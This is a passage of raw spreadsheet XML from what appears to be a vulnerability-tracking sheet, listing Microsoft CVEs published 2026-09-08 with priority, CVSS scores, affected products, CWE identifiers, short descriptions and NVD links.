r="J1123" s="5" t="inlineStr" /><c r="K1123" s="5" t="inlineStr" /><c r="L1123" s="5" t="inlineStr" /><c r="M1123" s="5" t="inlineStr" /><c r="N1123" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1123" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1123" s="5" t="inlineStr" /><c r="Q1123" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R1123" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1123" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t></is></c></row><row r="1124"><c r="A1124" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1124" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1124" s="5" t="inlineStr"><is><t>CVE-2026-69599</t></is></c><c r="D1124" s="5" t="n"><v>7.5</v></c><c r="E1124" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1124" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1124" s="5" t="inlineStr" /><c r="H1124" s="5" t="n"><v>0.007</v></c><c r="I1124" s="5" t="inlineStr" /><c r="J1124" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1124" s="5" t="inlineStr"><is><t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t></is></c><c r="L1124" s="5" t="inlineStr" /><c r="M1124" s="5" t="inlineStr" /><c r="N1124" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1124" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1124" s="5" t="inlineStr" /><c r="Q1124" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1124" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t></is></c><c r="S1124" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t></is></c></row><row r="1125"><c r="A1125" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1125" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1125" s="5" t="inlineStr"><is><t>CVE-2026-69607</t></is></c><c r="D1125" s="5" t="n"><v>7.5</v></c><c r="E1125" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1125" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1125" s="5" t="inlineStr" /><c r="H1125" s="5" t="n"><v>0.006</v></c><c r="I1125" s="5" t="inlineStr" /><c r="J1125" s="5" t="inlineStr" /><c r="K1125" s="5" t="inlineStr" /><c r="L1125" s="5" t="inlineStr" /><c r="M1125" s="5" t="inlineStr" /><c r="N1125" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1125" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1125" s="5" t="inlineStr" /><c r="Q1125" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1125" s="5" t="inlineStr"><is><t>Use after free in Windows Deployment Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="S1125" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69607</t></is></c></row><row r="1126"><c r="A1126" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1126" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1126" s="5" t="inlineStr"><is><t>CVE-2026-69631</t></is></c><c r="D1126" s="5" t="n"><v>7.5</v></c><c r="E1126" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1126" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1126" s="5" t="inlineStr" /><c r="H1126" s="5" t="n"><v>0.012</v></c><c r="I1126" s="5" t="inlineStr" /><c r="J1126" s="5" t="inlineStr" /><c r="K1126" s="5" t="inlineStr" /><c r="L1126" s="5" t="inlineStr" /><c r="M1126" s="5" t="inlineStr" /><c r="N1126" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1126" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1126" s="5" t="inlineStr" /><c r="Q1126" s="5" t="inlineStr"><is><t>CWE-190</t></is></c><c r="R1126" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows DNS allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1126" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69631</t></is></c></row><row r="1127"><c r="A1127" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1127" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1127" s="5" t="inlineStr"><is><t>CVE-2026-69710</t></is></c><c r="D1127" s="5" t="n"><v>7.5</v></c><c r="E1127" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1127" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1127" s="5" t="inlineStr" /><c r="H1127" s="5" t="n"><v>0.002</v></c><c r="I1127" s="5" t="inlineStr" /><c r="J1127" s="5" t="inlineStr" /><c r="K1127" s="5" t="inlineStr" /><c r="L1127" s="5" t="inlineStr" /><c r="M1127" s="5" t="inlineStr" /><c r="N1127" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1127" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1127" s="5" t="inlineStr" /><c r="Q1127" s="5" t="inlineStr"><is><t>CWE-362</t></is></c><c r="R1127" s="5" t="inlineStr"><is><t>Concurrent execution using shared resource with improper synchronization ('race condition') in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1127" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69710</t></is></c></row><row r="1128"><c r="A1128" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1128" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1128" s="5" t="inlineStr"><is><t>CVE-2026-69739</t></is></c><c r="D1128" s="5" t="n"><v>7.5</v></c><c r="E1128" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1128" s="5" t="inlineStr" /><c r="H1128" s="5" t="n"><v>0.008999999999999999</v></c><c r="I1128" s="5" t="inlineStr" /><c r="J1128" s="5" t="inlineStr" /><c r="K1128" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1128" s="5" t="inlineStr" /><c r="M1128" s="5" t="inlineStr" /><c r="N1128" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1128" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1128" s="5" t="inlineStr" /><c r="Q1128" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1128" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1128" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69739</t></is></c></row><row r="1129"><c r="A1129" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1129" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1129" s="5" t="inlineStr"><is><t>CVE-2026-69744</t></is></c><c r="D1129" s="5" t="n"><v>7.5</v></c><c r="E1129" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1129" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1129" s="5" t="inlineStr" /><c r="H1129" s="5" t="n"><v>0.011</v></c><c r="I1129" s="5" t="inlineStr" /><c r="J1129" s="5" t="inlineStr" /><c r="K1129" s="5" t="inlineStr" /><c r="L1129" s="5" t="inlineStr" /><c r="M1129" s="5" t="inlineStr" /><c r="N1129" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1129" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1129" s="5" t="inlineStr" /><c r="Q1129" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1129" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1129" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69744</t></is></c></row><row r="1130"><c r="A1130" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1130" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1130" s="5" t="inlineStr"><is><t>CVE-2026-69760</t></is></c><c r="D1130" s="5" t="n"><v>7.5</v></c><c r="E1130" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1130" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1130" s="5" t="inlineStr" /><c r="H1130" s="5" t="n"><v>0.011</v></c><c r="I1130" s="5" t="inlineStr" /><c r="J1130" s="5" t="inlineStr" /><c r="K1130" s="5" t="inlineStr" /><c r="L1130" s="5" t="inlineStr" /><c r="M1130" s="5" t="inlineStr" /><c r="N1130" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1130" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1130" s="5" t="inlineStr" /><c r="Q1130" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1130" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Kerberos allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1130" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69760</t></is></c></row><row r="1131"><c r="A1131" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1131" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1131" s="5" t="inlineStr"><is><t>CVE-2026-69793</t></is></c><c r="D1131" s="5" t="n"><v>7.5</v></c><c r="E1131" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1131" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1131" s="5" t="inlineStr" /><c r="H1131" s="5" t="n"><v>0.008</v></c><c r="I1131" s="5" t="inlineStr" /><c r="J1131" s="5" t="inlineStr" /><c r="K1131" s="5" t="inlineStr" /><c r="L1131" s="5" t="inlineStr" /><c r="M1131" s="5" t="inlineStr" /><c r="N1131" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1131" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1131" s="5" t="inlineStr" /><c r="Q1131" s="5" t="inlineStr"><is><t>CWE-1288</t></is></c><c r="R1131" s="5" t="inlineStr"><is><t>Improper validation of consistency within input in Windows TCP/IP allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="S1131" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69793</t></is></c></row><row r="1132"><c r="A1132" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1132" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1132" s="5" t="inlineStr"><is><t>CVE-2026-69803</t></is></c><c r="D1132" s="5" t="n"><v>7.5</v></c><c r="E1132" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1132" s="5" t="inlineStr" /><c r="H1132" s="5" t="n"><v>0.008</v></c><c r="I1132" s="5" t="inlineStr" /><c r="J1132" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1132" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1132" s="5" t="inlineStr" /><c r="M1132" s="5" t="inlineStr" /><c r="N1132" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1132" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1132" s="5" t="inlineStr" /><c r="Q1132" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1132" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1132" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69803</t></is></c></row><row r="1133"><c r="A1133" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1133" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1133" s="5" t="inlineStr"><is><t>CVE-2026-69804</t></is></c><c r="D1133" s="5" t="n"><v>7.5</v></c><c r="E1133" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1133" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1133" s="5" t="inlineStr" /><c r="H1133" s="5" t="n"><v>0.005</v></c><c r="I1133" s="5" t="inlineStr" /><c r="J1133" s="5" t="inlineStr"><is><t>microsoft:sharepoint</t></is></c><c r="K1133" s="5" t="inlineStr"><is><t>microsoft:sharepoint_server</t></is></c><c r="L1133" s="5" t="inlineStr" /><c r="M1133" s="5" t="inlineStr" /><c r="N1133" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1133" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1133" s="5" t="inlineStr" /><c r="Q1133" s="5" t="inlineStr"><is><t>CWE-367</t></is></c><c r="R1133" s="5" t="inlineStr"><is><t>Time-of-ch</t></is></c><c r="S1133" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69804</t></is></c></row><row r="1134"><c r="A1134" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1134" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1134" s="5" t="inlineStr"><is><t>CVE-2026-69805</t></is></c><c r="D1134" s="5" t="n"><v>7.5</v></c><c r="E1134" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1134" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1134" s="5" t="inlineStr" /><c r="H1134" s="5" t="n"><v>0.005</v></c><c r="I1134" s="5" t="inlineStr" /><c r="J1134" s="5" t="inlineStr" /><c r="K1134" s="5" t="inlineStr" /><c r="L1134" s="5" t="inlineStr" /><c r="M1134" s="5" t="inlineStr" /><c r="N1134" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1134" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1134" s="5" t="inlineStr" /><c r="Q1134" s="5" t="inlineStr"><is><t>CWE-200, CWE-522, CWE-73</t></is></c><c r="R1134" s="5" t="inlineStr"><is><t>External control of file name or path in .NET allows an unauthorized attacker to elevate privileges over a network.</t></is></c><c r="S1134" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69805</t></is></c></row><row r="1135"><c r="A1135" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1135" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1135" s="5" t="inlineStr"><is><t>CVE-2026-69809</t></is></c><c r="D1135" s="5" t="n"><v>7.5</v></c><c r="E1135" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1135" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1135" s="5" t="inlineStr" /><c r="H1135" s="5" t="n"><v>0.011</v></c><c r="I1135" s="5" t="inlineStr" /><c r="J1135" s="5" t="inlineStr" /><c r="K1135" s="5" t="inlineStr" /><c r="L1135" s="5" t="inlineStr" /><c r="M1135" s="5" t="inlineStr" /><c r="N1135" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1135" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1135" s="5" t="inlineStr" /><c r="Q1135" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R1135" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Active Directory Domain Services allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1135" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69809</t></is></c></row><row r="1136"><c r="A1136" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1136" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1136" s="5" t="inlineStr"><is><t>CVE-2026-69852</t></is></c><c r="D1136" s="5" t="n"><v>7.5</v></c><c r="E1136" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1136" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1136" s="5" t="inlineStr" /><c r="H1136" s="5" t="n"><v>0.006</v></c><c r="I1136" s="5" t="inlineStr" /><c r="J1136" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K113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36" s="5" t="inlineStr" /><c r="M1136" s="5" t="inlineStr" /><c r="N1136" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1136" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1136" s="5" t="inlineStr" /><c r="Q1136" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1136" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="S1136" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69852</t></is></c></row><row r="1137"><c r="A1137" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1137" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1137" s="5" t="inlineStr"><is><t>CVE-2026-69881</t></is></c><c r="D1137" s="5" t="n"><v>7.5</v></c><c r="E1137" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1137" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1137" s="5" t="inlineStr" /><c r="H1137" s="5" t="n"><v>0.012</v></c><c r="I1137" s="5" t="inlineStr" /><c r="J1137" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K113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37" s="5" t="inlineStr" /><c r="M1137" s="5" t="inlineStr" /><c r="N1137" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1137" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1137" s="5" t="inlineStr" /><c r="Q1137" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="R1137" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1137" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69881</t></is></c></row><row r="1138"><c r="A1138" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1138" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1138" s="5" t="inlineStr"><is><t>CVE-2026-69890</t></is></c><c r="D1138" s="5" t="n"><v>7.5</v></c><c r="E1138" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1138" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1138" s="5" t="inlineStr" /><c r="H1138" s="5" t="n"><v>0.003</v></c><c r="I1138" s="5" t="inlineStr" /><c r="J1138" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K113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38" s="5" t="inlineStr" /><c r="M1138" s="5" t="inlineStr" /><c r="N1138" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1138" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1138" s="5" t="inlineStr" /><c r="Q1138" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1138" s="5" t="inlineStr"><is><t>Use after free in Windows Virtual Trusted Platform Module allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1138" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69890</t></is></c></row><row r="1139"><c r="A1139" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1139" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1139" s="5" t="inlineStr"><is><t>CVE-2026-69929</t></is></c><c r="D1139" s="5" t="n"><v>7.5</v></c><c r="E1139" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1139" s="5" t="inlineStr" /><c r="H1139" s="5" t="n"><v>0.008</v></c><c r="I1139" s="5" t="inlineStr" /><c r="J1139" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1139" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1139" s="5" t="inlineStr" /><c r="M1139" s="5" t="inlineStr" /><c r="N1139" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1139" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1139" s="5" t="inlineStr" /><c r="Q1139" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1139" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1139" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69929</t></is></c></row><row r="1140"><c r="A1140" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1140" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1140" s="5" t="inlineStr"><is><t>CVE-2026-69930</t></is></c><c r="D1140" s="5" t="n"><v>7.5</v></c><c r="E1140" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1140" s="5" t="inlineStr" /><c r="H1140" s="5" t="n"><v>0.008</v></c><c r="I1140" s="5" t="inlineStr" /><c r="J1140" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1140" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1140" s="5" t="inlineStr" /><c r="M1140" s="5" t="inlineStr" /><c r="N1140" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1140" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1140" s="5" t="inlineStr" /><c r="Q1140" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1140" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1140" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69930</t></is></c></row><row r="1141"><c r="A1141" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1141" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1141" s="5" t="inlineStr"><is><t>CVE-2026-70065</t></is></c><c r="D1141" s="5" t="n"><v>7.5</v></c><c r="E1141" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1141" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1141" s="5" t="inlineStr" /><c r="H1141" s="5" t="n"><v>0.012</v></c><c r="I1141" s="5" t="inlineStr" /><c r="J1141" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1141" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1141" s="5" t="inlineStr" /><c r="M1141" s="5" t="inlineStr" /><c r="N1141" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1141" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1141" s="5" t="inlineStr" /><c r="Q1141" s="5" t="inlineStr"><is><t>CWE-401</t></is></c><c r="R1141" s="5" t="inlineStr"><is><t>Missing release of memory after effective lifetime in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t></is></c><c r="S1141" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70065</t></is></c></row><row r="1142"><c r="A1142" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1142" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1142" s="5" t="inlineStr"><is><t>CVE-2026-70124</t></is></c><c r="D1142" s="5" t="n"><v>7.5</v></c><c r="E1142" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1142" s="5" t="inlineStr" /><c r="H1142" s="5" t="n"><v>0.008</v></c><c r="I1142" s="5" t="inlineStr" /><c r="J1142" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1142" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L1142" s="5" t="inlineStr" /><c r="M1142" s="5" t="inlineStr" /><c r="N1142" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1142" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1142" s="5" t="inlineStr" /><c r="Q1142" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1142" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1142" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70124</t></is></c></row><row r="1143"><c r="A1143" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1143" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1143" s="5" t="inlineStr"><is><t>CVE-2026-70570</t></is></c><c r="D1143" s="5" t="n"><v>7.5</v></c><c r="E1143" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1143" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1143" s="5" t="inlineStr" /><c r="H1143" s="5" t="n"><v>0.004</v></c><c r="I1143" s="5" t="inlineStr" /><c r="J1143" s="5" t="inlineStr" /><c r="K1143" s="5" t="inlineStr" /><c r="L1143" s="5" t="inlineStr" /><c r="M1143" s="5" t="inlineStr" /><c r="N1143" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1143" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1143" s="5" t="inlineStr" /><c r="Q1143" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="R1143" s="5" t="inlineStr"><is><t>Remote Code Execution in Windows Routing and Remote Access Service (RRAS) allows attacker to gain an unauthorized access to victim's machine</t></is></c><c r="S1143" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70570</t></is></c></row><row r="1144"><c r="A1144" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1144" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1144" s="5" t="inlineStr"><is><t>CVE-2026-70579</t></is></c><c r="D1144" s="5" t="n"><v>7.5</v></c><c r="E1144" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1144" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1144" s="5" t="inlineStr" /><c r="H1144" s="5" t="n"><v>0.01</v></c><c r="I1144" s="5" t="inlineStr" /><c r="J1144" s="5" t="inlineStr" /><c r="K1144" s="5" t="inlineStr" /><c r="L1144" s="5" t="inlineStr" /><c r="M1144" s="5" t="inlineStr" /><c r="N1144" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1144" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1144" s="5" t="inlineStr" /><c r="Q1144" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1144" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Mobile Broadband allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1144" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70579</t></is></c></row><row r="1145"><c r="A1145" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B1145" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1145" s="5" t="inlineStr"><is><t>CVE-2026-70587</t></is></c><c r="D1145" s="5" t="n"><v>7.5</v></c><c r="E1145" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F1145" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1145" s="5" t="inlineStr" /><c r="H1145" s="5" t="n"><v>0.008</v></c><c r="I1145" s="5" t="inlineStr" /><c r="J1145" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K11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45" s="5" t="inlineStr" /><c r="M1145" s="5" t="inlineStr" /><c r="N1145" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1145" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1145" s="5" t="inlineStr" /><c r="Q1145" s="5" t="inlineStr"><is><t>CWE-170</t></is></c><c r="R1145" s="5" t="inlineStr"><is><t>Improper null termination in Windows Remote Desktop Protocol allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="S1145" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70587</t></is></c></row><row r="1146"><c r="A1146" s="5" 